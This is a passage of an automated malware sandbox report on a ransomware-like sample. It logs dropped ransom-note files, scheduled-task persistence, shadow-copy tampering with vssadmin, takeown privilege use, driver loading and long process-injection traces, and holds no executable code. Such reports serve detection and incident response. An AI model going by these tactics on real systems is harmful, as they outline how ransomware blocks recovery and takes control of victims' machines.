(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\sfs_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1100 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4344 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe 4184 L5BjIoLQ64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4184 L5BjIoLQ64.exe -
Suspicious use of AdjustPrivilegeToken 102 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4112 takeown.exe Token: SeDebugPrivilege 4184 L5BjIoLQ64.exe Token: SeLoadDriverPrivilege 4184 L5BjIoLQ64.exe Token: SeTakeOwnershipPrivilege 4828 takeown.exe Token: SeTakeOwnershipPrivilege 5076 takeown.exe Token: SeTakeOwnershipPrivilege 4320 takeown.exe Token: SeTakeOwnershipPrivilege 4484 takeown.exe Token: SeTakeOwnershipPrivilege 4708 takeown.exe Token: SeTakeOwnershipPrivilege 4880 takeown.exe Token: SeTakeOwnershipPrivilege 4956 takeown.exe Token: SeTakeOwnershipPrivilege 4316 takeown.exe Token: SeTakeOwnershipPrivilege 4384 takeown.exe Token: SeTakeOwnershipPrivilege 792 takeown.exe Token: SeTakeOwnershipPrivilege 4140 takeown.exe Token: SeTakeOwnershipPrivilege 4248 takeown.exe Token: SeTakeOwnershipPrivilege 4436 takeown.exe Token: SeTakeOwnershipPrivilege 4876 takeown.exe Token: SeTakeOwnershipPrivilege 4428 takeown.exe Token: SeTakeOwnershipPrivilege 4760 takeown.exe Token: SeTakeOwnershipPrivilege 3188 takeown.exe Token: SeTakeOwnershipPrivilege 4676 takeown.exe Token: SeTakeOwnershipPrivilege 3852 takeown.exe Token: SeTakeOwnershipPrivilege 4668 takeown.exe Token: SeTakeOwnershipPrivilege 4728 takeown.exe Token: SeTakeOwnershipPrivilege 4692 takeown.exe Token: SeTakeOwnershipPrivilege 4568 takeown.exe Token: SeTakeOwnershipPrivilege 4752 takeown.exe Token: SeTakeOwnershipPrivilege 3728 takeown.exe Token: SeTakeOwnershipPrivilege 2368 takeown.exe Token: SeTakeOwnershipPrivilege 4696 takeown.exe Token: SeTakeOwnershipPrivilege 4452 takeown.exe Token: SeTakeOwnershipPrivilege 5060 takeown.exe Token: SeTakeOwnershipPrivilege 5228 takeown.exe Token: SeTakeOwnershipPrivilege 5376 takeown.exe Token: SeTakeOwnershipPrivilege 5452 takeown.exe Token: SeTakeOwnershipPrivilege 5492 takeown.exe Token: SeTakeOwnershipPrivilege 5820 takeown.exe Token: SeTakeOwnershipPrivilege 5988 takeown.exe Token: SeTakeOwnershipPrivilege 5156 takeown.exe Token: SeTakeOwnershipPrivilege 5316 takeown.exe Token: SeTakeOwnershipPrivilege 5428 takeown.exe Token: SeTakeOwnershipPrivilege 5756 takeown.exe Token: SeTakeOwnershipPrivilege 5992 takeown.exe Token: SeTakeOwnershipPrivilege 6096 takeown.exe Token: SeTakeOwnershipPrivilege 5220 takeown.exe Token: SeTakeOwnershipPrivilege 5692 takeown.exe Token: SeTakeOwnershipPrivilege 5608 takeown.exe Token: SeTakeOwnershipPrivilege 5140 takeown.exe Token: SeTakeOwnershipPrivilege 5456 takeown.exe Token: SeTakeOwnershipPrivilege 5780 takeown.exe Token: SeTakeOwnershipPrivilege 5860 takeown.exe Token: SeTakeOwnershipPrivilege 5560 takeown.exe Token: SeBackupPrivilege 5236 vssvc.exe Token: SeRestorePrivilege 5236 vssvc.exe Token: SeAuditPrivilege 5236 vssvc.exe Token: SeTakeOwnershipPrivilege 4364 takeown.exe Token: SeTakeOwnershipPrivilege 6084 takeown.exe Token: SeTakeOwnershipPrivilege 5528 takeown.exe Token: SeTakeOwnershipPrivilege 5400 takeown.exe Token: SeTakeOwnershipPrivilege 5520 takeown.exe Token: SeIncreaseQuotaPrivilege 5440 WMIC.exe Token: SeSecurityPrivilege 5440 WMIC.exe Token: SeTakeOwnershipPrivilege 5440 WMIC.exe Token: SeLoadDriverPrivilege 5440 WMIC.exe Token: SeSystemProfilePrivilege 5440 WMIC.exe Token: SeSystemtimePrivilege 5440 WMIC.exe Token: SeProfSingleProcessPrivilege 5440 WMIC.exe Token: SeIncBasePriorityPrivilege 5440 WMIC.exe Token: SeCreatePagefilePrivilege 5440 WMIC.exe Token: SeBackupPrivilege 5440 WMIC.exe Token: SeRestorePrivilege 5440 WMIC.exe Token: SeShutdownPrivilege 5440 WMIC.exe Token: SeDebugPrivilege 5440 WMIC.exe Token: SeSystemEnvironmentPrivilege 5440 WMIC.exe Token: SeRemoteShutdownPrivilege 5440 WMIC.exe Token: SeUndockPrivilege 5440 WMIC.exe Token: SeManageVolumePrivilege 5440 WMIC.exe Token: 33 5440 WMIC.exe Token: 34 5440 WMIC.exe Token: 35 5440 WMIC.exe Token: 36 5440 WMIC.exe Token: SeIncreaseQuotaPrivilege 5440 WMIC.exe Token: SeSecurityPrivilege 5440 WMIC.exe Token: SeTakeOwnershipPrivilege 5440 WMIC.exe Token: SeLoadDriverPrivilege 5440 WMIC.exe Token: SeSystemProfilePrivilege 5440 WMIC.exe Token: SeSystemtimePrivilege 5440 WMIC.exe Token: SeProfSingleProcessPrivilege 5440 WMIC.exe Token: SeIncBasePriorityPrivilege 5440 WMIC.exe Token: SeCreatePagefilePrivilege 5440 WMIC.exe Token: SeBackupPrivilege 5440 WMIC.exe Token: SeRestorePrivilege 5440 WMIC.exe Token: SeShutdownPrivilege 5440 WMIC.exe Token: SeDebugPrivilege 5440 WMIC.exe Token: SeSystemEnvironmentPrivilege 5440 WMIC.exe Token: SeRemoteShutdownPrivilege 5440 WMIC.exe Token: SeUndockPrivilege 5440 WMIC.exe Token: SeManageVolumePrivilege 5440 WMIC.exe Token: 33 5440 WMIC.exe Token: 34 5440 WMIC.exe Token: 35 5440 WMIC.exe Token: 36 5440 WMIC.exe -
Suspicious use of WriteProcessMemory 1254 IoCs
description pid Process procid_target PID 3832 wrote to memory of 2356 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 3832 wrote to memory of 2356 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 3832 wrote to memory of 2356 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 3832 wrote to memory of 2860 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 75 PID 3832 wrote to memory of 2860 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 75 PID 3832 wrote to memory of 2860 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 75 PID 3832 wrote to memory of 3864 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 77 PID 3832 wrote to memory of 3864 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 77 PID 3832 wrote to memory of 3864 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 77 PID 3832 wrote to memory of 736 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 78 PID 3832 wrote to memory of 736 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 78 PID 3832 wrote to memory of 736 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 78 PID 3864 wrote to memory of 2776 3864 cmd.exe 81 PID 3864 wrote to memory of 2776 3864 cmd.exe 81 PID 3864 wrote to memory of 2776 3864 cmd.exe 81 PID 736 wrote to memory of 3368 736 cmd.exe 82 PID 736 wrote to memory of 3368 736 cmd.exe 82 PID 736 wrote to memory of 3368 736 cmd.exe 82 PID 3864 wrote to memory of 4000 3864 cmd.exe 83 PID 3864 wrote to memory of 4000 3864 cmd.exe 83 PID 3864 wrote to memory of 4000 3864 cmd.exe 83 PID 3864 wrote to memory of 3840 3864 cmd.exe 84 PID 3864 wrote to memory of 3840 3864 cmd.exe 84 PID 3864 wrote to memory of 3840 3864 cmd.exe 84 PID 3832 wrote to memory of 416 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 85 PID 3832 wrote to memory of 416 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 85 PID 3832 wrote to memory of 416 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 85 PID 416 wrote to memory of 1348 416 cmd.exe 88 PID 416 wrote to memory of 1348 416 cmd.exe 88 PID 416 wrote to memory of 1348 416 cmd.exe 88 PID 416 wrote to memory of 4112 416 cmd.exe 91 PID 416 wrote to memory of 4112 416 cmd.exe 91 PID 416 wrote to memory of 4112 416 cmd.exe 91 PID 416 wrote to memory of 4132 416 cmd.exe 92 PID 416 wrote to memory of 4132 416 cmd.exe 92 PID 416 wrote to memory of 4132 416 cmd.exe 92 PID 4132 wrote to memory of 4148 4132 cmd.exe 93 PID 4132 wrote to memory of 4148 4132 cmd.exe 93 PID 4132 wrote to memory of 4148 4132 cmd.exe 93 PID 4148 wrote to memory of 4184 4148 L5BjIoLQ.exe 94 PID 4148 wrote to memory of 4184 4148 L5BjIoLQ.exe 94 PID 3832 wrote to memory of 4224 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 95 PID 3832 wrote to memory of 4224 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 95 PID 3832 wrote to memory of 4224 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 95 PID 4224 wrote to memory of 4272 4224 cmd.exe 97 PID 4224 wrote to memory of 4272 4224 cmd.exe 97 PID 4224 wrote to memory of 4272 4224 cmd.exe 97 PID 4224 wrote to memory of 4292 4224 cmd.exe 98 PID 4224 wrote to memory of 4292 4224 cmd.exe 98 PID 4224 wrote to memory of 4292 4224 cmd.exe 98 PID 4224 wrote to memory of 4312 4224 cmd.exe 99 PID 4224 wrote to memory of 4312 4224 cmd.exe 99 PID 4224 wrote to memory of 4312 4224 cmd.exe 99 PID 4312 wrote to memory of 4328 4312 cmd.exe 100 PID 4312 wrote to memory of 4328 4312 cmd.exe 100 PID 4312 wrote to memory of 4328 4312 cmd.exe 100 PID 4224 wrote to memory of 4380 4224 cmd.exe 101 PID 4224 wrote to memory of 4380 4224 cmd.exe 101 PID 4224 wrote to memory of 4380 4224 cmd.exe 101 PID 3832 wrote to memory of 4408 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 102 PID 3832 wrote to memory of 4408 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 102 PID 3832 wrote to memory of 4408 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 102 PID 4408 wrote to memory of 4456 4408 cmd.exe 104 PID 4408 wrote to memory of 4456 4408 cmd.exe 104 PID 4408 wrote to memory of 4456 4408 cmd.exe 104 PID 4408 wrote to memory of 4476 4408 cmd.exe 105 PID 4408 wrote to memory of 4476 4408 cmd.exe 105 PID 4408 wrote to memory of 4476 4408 cmd.exe 105 PID 4408 wrote to memory of 4496 4408 cmd.exe 106 PID 4408 wrote to memory of 4496 4408 cmd.exe 106 PID 4408 wrote to memory of 4496 4408 cmd.exe 106 PID 4496 wrote to memory of 4512 4496 cmd.exe 107 PID 4496 wrote to memory of 4512 4496 cmd.exe 107 PID 4496 wrote to memory of 4512 4496 cmd.exe 107 PID 4408 wrote to memory of 4536 4408 cmd.exe 108 PID 4408 wrote to memory of 4536 4408 cmd.exe 108 PID 4408 wrote to memory of 4536 4408 cmd.exe 108 PID 3832 wrote to memory of 4596 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 110 PID 3832 wrote to memory of 4596 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 110 PID 3832 wrote to memory of 4596 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 110 PID 4596 wrote to memory of 4644 4596 cmd.exe 112 PID 4596 wrote to memory of 4644 4596 cmd.exe 112 PID 4596 wrote to memory of 4644 4596 cmd.exe 112 PID 4596 wrote to memory of 4664 4596 cmd.exe 113 PID 4596 wrote to memory of 4664 4596 cmd.exe 113 PID 4596 wrote to memory of 4664 4596 cmd.exe 113 PID 4596 wrote to memory of 4684 4596 cmd.exe 114 PID 4596 wrote to memory of 4684 4596 cmd.exe 114 PID 4596 wrote to memory of 4684 4596 cmd.exe 114 PID 4684 wrote to memory of 4700 4684 cmd.exe 115 PID 4684 wrote to memory of 4700 4684 cmd.exe 115 PID 4684 wrote to memory of 4700 4684 cmd.exe 115 PID 4596 wrote to memory of 4724 4596 cmd.exe 116 PID 4596 wrote to memory of 4724 4596 cmd.exe 116 PID 4596 wrote to memory of 4724 4596 cmd.exe 116 PID 3832 wrote to memory of 4756 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 117 PID 3832 wrote to memory of 4756 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 117 PID 3832 wrote to memory of 4756 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 117 PID 4756 wrote to memory of 4804 4756 cmd.exe 119 PID 4756 wrote to memory of 4804 4756 cmd.exe 119 PID 4756 wrote to memory of 4804 4756 cmd.exe 119 PID 4756 wrote to memory of 4828 4756 cmd.exe 120 PID 4756 wrote to memory of 4828 4756 cmd.exe 120 PID 4756 wrote to memory of 4828 4756 cmd.exe 120 PID 4756 wrote to memory of 4848 4756 cmd.exe 121 PID 4756 wrote to memory of 4848 4756 cmd.exe 121 PID 4756 wrote to memory of 4848 4756 cmd.exe 121 PID 4848 wrote to memory of 4864 4848 cmd.exe 122 PID 4848 wrote to memory of 4864 4848 cmd.exe 122 PID 4848 wrote to memory of 4864 4848 cmd.exe 122 PID 4756 wrote to memory of 4884 4756 cmd.exe 123 PID 4756 wrote to memory of 4884 4756 cmd.exe 123 PID 4756 wrote to memory of 4884 4756 cmd.exe 123 PID 3832 wrote to memory of 4916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 124 PID 3832 wrote to memory of 4916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 124 PID 3832 wrote to memory of 4916 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 124 PID 4916 wrote to memory of 5048 4916 cmd.exe 126 PID 4916 wrote to memory of 5048 4916 cmd.exe 126 PID 4916 wrote to memory of 5048 4916 cmd.exe 126 PID 4916 wrote to memory of 5076 4916 cmd.exe 127 PID 4916 wrote to memory of 5076 4916 cmd.exe 127 PID 4916 wrote to memory of 5076 4916 cmd.exe 127 PID 4916 wrote to memory of 5096 4916 cmd.exe 128 PID 4916 wrote to memory of 5096 4916 cmd.exe 128 PID 4916 wrote to memory of 5096 4916 cmd.exe 128 PID 5096 wrote to memory of 5112 5096 cmd.exe 129 PID 5096 wrote to memory of 5112 5096 cmd.exe 129 PID 5096 wrote to memory of 5112 5096 cmd.exe 129 PID 4916 wrote to memory of 4120 4916 cmd.exe 130 PID 4916 wrote to memory of 4120 4916 cmd.exe 130 PID 4916 wrote to memory of 4120 4916 cmd.exe 130 PID 3832 wrote to memory of 4160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 131 PID 3832 wrote to memory of 4160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 131 PID 3832 wrote to memory of 4160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 131 PID 4160 wrote to memory of 4300 4160 cmd.exe 133 PID 4160 wrote to memory of 4300 4160 cmd.exe 133 PID 4160 wrote to memory of 4300 4160 cmd.exe 133 PID 4160 wrote to memory of 4320 4160 cmd.exe 134 PID 4160 wrote to memory of 4320 4160 cmd.exe 134 PID 4160 wrote to memory of 4320 4160 cmd.exe 134 PID 4160 wrote to memory of 2756 4160 cmd.exe 135 PID 4160 wrote to memory of 2756 4160 cmd.exe 135 PID 4160 wrote to memory of 2756 4160 cmd.exe 135 PID 2756 wrote to memory of 2064 2756 cmd.exe 136 PID 2756 wrote to memory of 2064 2756 cmd.exe 136 PID 2756 wrote to memory of 2064 2756 cmd.exe 136 PID 4160 wrote to memory of 4332 4160 cmd.exe 137 PID 4160 wrote to memory of 4332 4160 cmd.exe 137 PID 4160 wrote to memory of 4332 4160 cmd.exe 137 PID 3832 wrote to memory of 4396 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 138 PID 3832 wrote to memory of 4396 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 138 PID 3832 wrote to memory of 4396 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 138 PID 4396 wrote to memory of 4424 4396 cmd.exe 140 PID 4396 wrote to memory of 4424 4396 cmd.exe 140 PID 4396 wrote to memory of 4424 4396 cmd.exe 140 PID 4396 wrote to memory of 4484 4396 cmd.exe 141 PID 4396 wrote to memory of 4484 4396 cmd.exe 141 PID 4396 wrote to memory of 4484 4396 cmd.exe 141 PID 4396 wrote to memory of 4520 4396 cmd.exe 142 PID 4396 wrote to memory of 4520 4396 cmd.exe 142 PID 4396 wrote to memory of 4520 4396 cmd.exe 142 PID 4520 wrote to memory of 4500 4520 cmd.exe 143 PID 4520 wrote to memory of 4500 4520 cmd.exe 143 PID 4520 wrote to memory of 4500 4520 cmd.exe 143 PID 4396 wrote to memory of 4556 4396 cmd.exe 144 PID 4396 wrote to memory of 4556 4396 cmd.exe 144 PID 4396 wrote to memory of 4556 4396 cmd.exe 144 PID 3832 wrote to memory of 4412 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 145 PID 3832 wrote to memory of 4412 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 145 PID 3832 wrote to memory of 4412 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 145 PID 4412 wrote to memory of 4672 4412 cmd.exe 147 PID 4412 wrote to memory of 4672 4412 cmd.exe 147 PID 4412 wrote to memory of 4672 4412 cmd.exe 147 PID 4412 wrote to memory of 4708 4412 cmd.exe 148 PID 4412 wrote to memory of 4708 4412 cmd.exe 148 PID 4412 wrote to memory of 4708 4412 cmd.exe 148 PID 4412 wrote to memory of 4688 4412 cmd.exe 149 PID 4412 wrote to memory of 4688 4412 cmd.exe 149 PID 4412 wrote to memory of 4688 4412 cmd.exe 149 PID 4688 wrote to memory of 4744 4688 cmd.exe 150 PID 4688 wrote to memory of 4744 4688 cmd.exe 150 PID 4688 wrote to memory of 4744 4688 cmd.exe 150 PID 4412 wrote to memory of 4624 4412 cmd.exe 151 PID 4412 wrote to memory of 4624 4412 cmd.exe 151 PID 4412 wrote to memory of 4624 4412 cmd.exe 151 PID 3832 wrote to memory of 4608 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 152 PID 3832 wrote to memory of 4608 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 152 PID 3832 wrote to memory of 4608 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 152 PID 4608 wrote to memory of 4856 4608 cmd.exe 154 PID 4608 wrote to memory of 4856 4608 cmd.exe 154 PID 4608 wrote to memory of 4856 4608 cmd.exe 154 PID 4608 wrote to memory of 4880 4608 cmd.exe 155 PID 4608 wrote to memory of 4880 4608 cmd.exe 155 PID 4608 wrote to memory of 4880 4608 cmd.exe 155 PID 3368 wrote to memory of 4904 3368 wscript.exe 156 PID 3368 wrote to memory of 4904 3368 wscript.exe 156 PID 3368 wrote to memory of 4904 3368 wscript.exe 156 PID 4608 wrote to memory of 4772 4608 cmd.exe 158 PID 4608 wrote to memory of 4772 4608 cmd.exe 158 PID 4608 wrote to memory of 4772 4608 cmd.exe 158 PID 4772 wrote to memory of 2156 4772 cmd.exe 159 PID 4772 wrote to memory of 2156 4772 cmd.exe 159 PID 4772 wrote to memory of 2156 4772 cmd.exe 159 PID 4904 wrote to memory of 1100 4904 cmd.exe 160 PID 4904 wrote to memory of 1100 4904 cmd.exe 160 PID 4904 wrote to memory of 1100 4904 cmd.exe 160 PID 4608 wrote to memory of 5084 4608 cmd.exe 161 PID 4608 wrote to memory of 5084 4608 cmd.exe 161 PID 4608 wrote to memory of 5084 4608 cmd.exe 161 PID 3832 wrote to memory of 4576 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 162 PID 3832 wrote to memory of 4576 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 162 PID 3832 wrote to memory of 4576 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 162 PID 4576 wrote to memory of 4116 4576 cmd.exe 164 PID 4576 wrote to memory of 4116 4576 cmd.exe 164 PID 4576 wrote to memory of 4116 4576 cmd.exe 164 PID 4576 wrote to memory of 4956 4576 cmd.exe 165 PID 4576 wrote to memory of 4956 4576 cmd.exe 165 PID 4576 wrote to memory of 4956 4576 cmd.exe 165 PID 4576 wrote to memory of 4108 4576 cmd.exe 166 PID 4576 wrote to memory of 4108 4576 cmd.exe 166 PID 4576 wrote to memory of 4108 4576 cmd.exe 166 PID 4108 wrote to memory of 2424 4108 cmd.exe 167 PID 4108 wrote to memory of 2424 4108 cmd.exe 167 PID 4108 wrote to memory of 2424 4108 cmd.exe 167 PID 4576 wrote to memory of 2428 4576 cmd.exe 168 PID 4576 wrote to memory of 2428 4576 cmd.exe 168 PID 4576 wrote to memory of 2428 4576 cmd.exe 168 PID 3832 wrote to memory of 4304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 169 PID 3832 wrote to memory of 4304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 169 PID 3832 wrote to memory of 4304 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 169 PID 4304 wrote to memory of 2956 4304 cmd.exe 171 PID 4304 wrote to memory of 2956 4304 cmd.exe 171 PID 4304 wrote to memory of 2956 4304 cmd.exe 171 PID 4304 wrote to memory of 4316 4304 cmd.exe 172 PID 4304 wrote to memory of 4316 4304 cmd.exe 172 PID 4304 wrote to memory of 4316 4304 cmd.exe 172 PID 4304 wrote to memory of 4280 4304 cmd.exe 173 PID 4304 wrote to memory of 4280 4304 cmd.exe 173 PID 4304 wrote to memory of 4280 4304 cmd.exe 173 PID 4280 wrote to memory of 4192 4280 cmd.exe 174 PID 4280 wrote to memory of 4192 4280 cmd.exe 174 PID 4280 wrote to memory of 4192 4280 cmd.exe 174 PID 4304 wrote to memory of 4464 4304 cmd.exe 175 PID 4304 wrote to memory of 4464 4304 cmd.exe 175 PID 4304 wrote to memory of 4464 4304 cmd.exe 175 PID 3832 wrote to memory of 4532 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 176 PID 3832 wrote to memory of 4532 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 176 PID 3832 wrote to memory of 4532 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 176 PID 4532 wrote to memory of 4448 4532 cmd.exe 178 PID 4532 wrote to memory of 4448 4532 cmd.exe 178 PID 4532 wrote to memory of 4448 4532 cmd.exe 178 PID 4532 wrote to memory of 4384 4532 cmd.exe 179 PID 4532 wrote to memory of 4384 4532 cmd.exe 179 PID 4532 wrote to memory of 4384 4532 cmd.exe 179 PID 4532 wrote to memory of 4444 4532 cmd.exe 180 PID 4532 wrote to memory of 4444 4532 cmd.exe 180 PID 4532 wrote to memory of 4444 4532 cmd.exe 180 PID 4444 wrote to memory of 4680 4444 cmd.exe 181 PID 4444 wrote to memory of 4680 4444 cmd.exe 181 PID 4444 wrote to memory of 4680 4444 cmd.exe 181 PID 4532 wrote to memory of 4732 4532 cmd.exe 182 PID 4532 wrote to memory of 4732 4532 cmd.exe 182 PID 4532 wrote to memory of 4732 4532 cmd.exe 182 PID 3832 wrote to memory of 4640 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 183 PID 3832 wrote to memory of 4640 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 183 PID 3832 wrote to memory of 4640 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 183 PID 4640 wrote to memory of 4648 4640 cmd.exe 185 PID 4640 wrote to memory of 4648 4640 cmd.exe 185 PID 4640 wrote to memory of 4648 4640 cmd.exe 185 PID 4640 wrote to memory of 792 4640 cmd.exe 186 PID 4640 wrote to memory of 792 4640 cmd.exe 186 PID 4640 wrote to memory of 792 4640 cmd.exe 186 PID 4640 wrote to memory of 4896 4640 cmd.exe 187 PID 4640 wrote to memory of 4896 4640 cmd.exe 187 PID 4640 wrote to memory of 4896 4640 cmd.exe 187 PID 4896 wrote to memory of 4892 4896 cmd.exe 188 PID 4896 wrote to memory of 4892 4896 cmd.exe 188 PID 4896 wrote to memory of 4892 4896 cmd.exe 188 PID 4640 wrote to memory of 5064 4640 cmd.exe 189 PID 4640 wrote to memory of 5064 4640 cmd.exe 189 PID 4640 wrote to memory of 5064 4640 cmd.exe 189 PID 3832 wrote to memory of 5080 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 190 PID 3832 wrote to memory of 5080 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 190 PID 3832 wrote to memory of 5080 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 190 PID 5080 wrote to memory of 4808 5080 cmd.exe 192 PID 5080 wrote to memory of 4808 5080 cmd.exe 192 PID 5080 wrote to memory of 4808 5080 cmd.exe 192 PID 5080 wrote to memory of 4140 5080 cmd.exe 193 PID 5080 wrote to memory of 4140 5080 cmd.exe 193 PID 5080 wrote to memory of 4140 5080 cmd.exe 193 PID 5080 wrote to memory of 1108 5080 cmd.exe 194 PID 5080 wrote to memory of 1108 5080 cmd.exe 194 PID 5080 wrote to memory of 1108 5080 cmd.exe 194 PID 1108 wrote to memory of 3704 1108 cmd.exe 195 PID 1108 wrote to memory of 3704 1108 cmd.exe 195 PID 1108 wrote to memory of 3704 1108 cmd.exe 195 PID 5080 wrote to memory of 4196 5080 cmd.exe 196 PID 5080 wrote to memory of 4196 5080 cmd.exe 196 PID 5080 wrote to memory of 4196 5080 cmd.exe 196 PID 3832 wrote to memory of 1968 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 197 PID 3832 wrote to memory of 1968 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 197 PID 3832 wrote to memory of 1968 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 197 PID 1968 wrote to memory of 4216 1968 cmd.exe 199 PID 1968 wrote to memory of 4216 1968 cmd.exe 199 PID 1968 wrote to memory of 4216 1968 cmd.exe 199 PID 1968 wrote to memory of 4248 